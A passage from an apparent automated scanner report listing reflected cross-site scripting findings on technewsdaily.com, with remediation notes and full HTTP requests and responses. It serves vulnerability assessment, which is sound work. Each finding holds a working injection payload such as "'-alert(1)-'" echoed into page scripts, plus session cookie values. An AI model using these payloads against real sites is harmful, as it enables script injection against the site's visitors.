HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 62060
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/creative-releases-7-inch-android-tablet-for-270-1835/?12533"><a>fe2216afc2c=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3'-alert(1)-'6af313e49d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /delicious-not-shutting-down-no-reason-to-panic-1834edce3'-alert(1)-'6af313e49d1/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:11 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40500
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... e="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834edce3'-alert(1)-'6af313e49d1/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.41. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61885"><a>98580f18eb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /delicious-not-shutting-down-no-reason-to-panic-1834/?61885"><a>98580f18eb3=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:50 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64457
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/?61885"><a>98580f18eb3=1/" /> ...[SNIP]...
1.42. http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add70'-alert(1)-'8b8d1bfde12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /delicious-not-shutting-down-no-reason-to-panic-1834/?add70'-alert(1)-'8b8d1bfde12=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:06 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 64095
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... "text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/delicious-not-shutting-down-no-reason-to-panic-1834/?add70'-alert(1)-'8b8d1bfde12=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c56b'-alert(1)-'fd3074b97ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /delicious-social-bookmarking-alternatives-18311c56b'-alert(1)-'fd3074b97ea/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40490
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... t type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-18311c56b'-alert(1)-'fd3074b97ea/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.44. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/delicious-social-bookmarking-alternatives-1831/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24b38'-alert(1)-'c4ad2cea373 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /delicious-social-bookmarking-alternatives-1831/?24b38'-alert(1)-'c4ad2cea373=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:07 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 67230
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/?24b38'-alert(1)-'c4ad2cea373=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.45. http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/delicious-social-bookmarking-alternatives-1831/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efcac"><a>dbbd9a31ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /delicious-social-bookmarking-alternatives-1831/?efcac"><a>dbbd9a31ba5=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:53 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 67592
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/delicious-social-bookmarking-alternatives-1831/?efcac"><a>dbbd9a31ba5=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96f9e'-alert(1)-'636bd5a0400 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dmca-copyright96f9e'-alert(1)-'636bd5a0400/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40426
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/dmca-copyright96f9e'-alert(1)-'636bd5a0400/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.47. http://www.technewsdaily.com/dmca-copyright/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/dmca-copyright/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83973'-alert(1)-'6a39f46af5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dmca-copyright/?83973'-alert(1)-'6a39f46af5=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40290
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/dmca-copyright/?83973'-alert(1)-'6a39f46af5=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c9fb'-alert(1)-'db60bcb0c1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /etomb-tweets-from-beyond-the-grave-16499c9fb'-alert(1)-'db60bcb0c1c/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40476
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-16499c9fb'-alert(1)-'db60bcb0c1c/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.49. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/etomb-tweets-from-beyond-the-grave-1649/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 664dd"><a>2fdfbe4d5ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /etomb-tweets-from-beyond-the-grave-1649/?664dd"><a>2fdfbe4d5ea=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63425
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/?664dd"><a>2fdfbe4d5ea=1/" /> ...[SNIP]...
1.50. http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/etomb-tweets-from-beyond-the-grave-1649/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae63f'-alert(1)-'99560dcf432 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /etomb-tweets-from-beyond-the-grave-1649/?ae63f'-alert(1)-'99560dcf432=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63063
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/etomb-tweets-from-beyond-the-grave-1649/?ae63f'-alert(1)-'99560dcf432=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13b23'-alert(1)-'29f84241f15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /facebook-cartoon-profile-picture-trends-175713b23'-alert(1)-'29f84241f15/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:57:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:57:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40486
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... ipt type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-175713b23'-alert(1)-'29f84241f15/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.52. http://www.technewsdaily.com/facebook-cartoon-profile-picture-trends-1757/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/facebook-cartoon-profile-picture-trends-1757/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddb0a"><a>e723fad5a8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /facebook-cartoon-profile-picture-trends-1757/?ddb0a"><a>e723fad5a8d=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
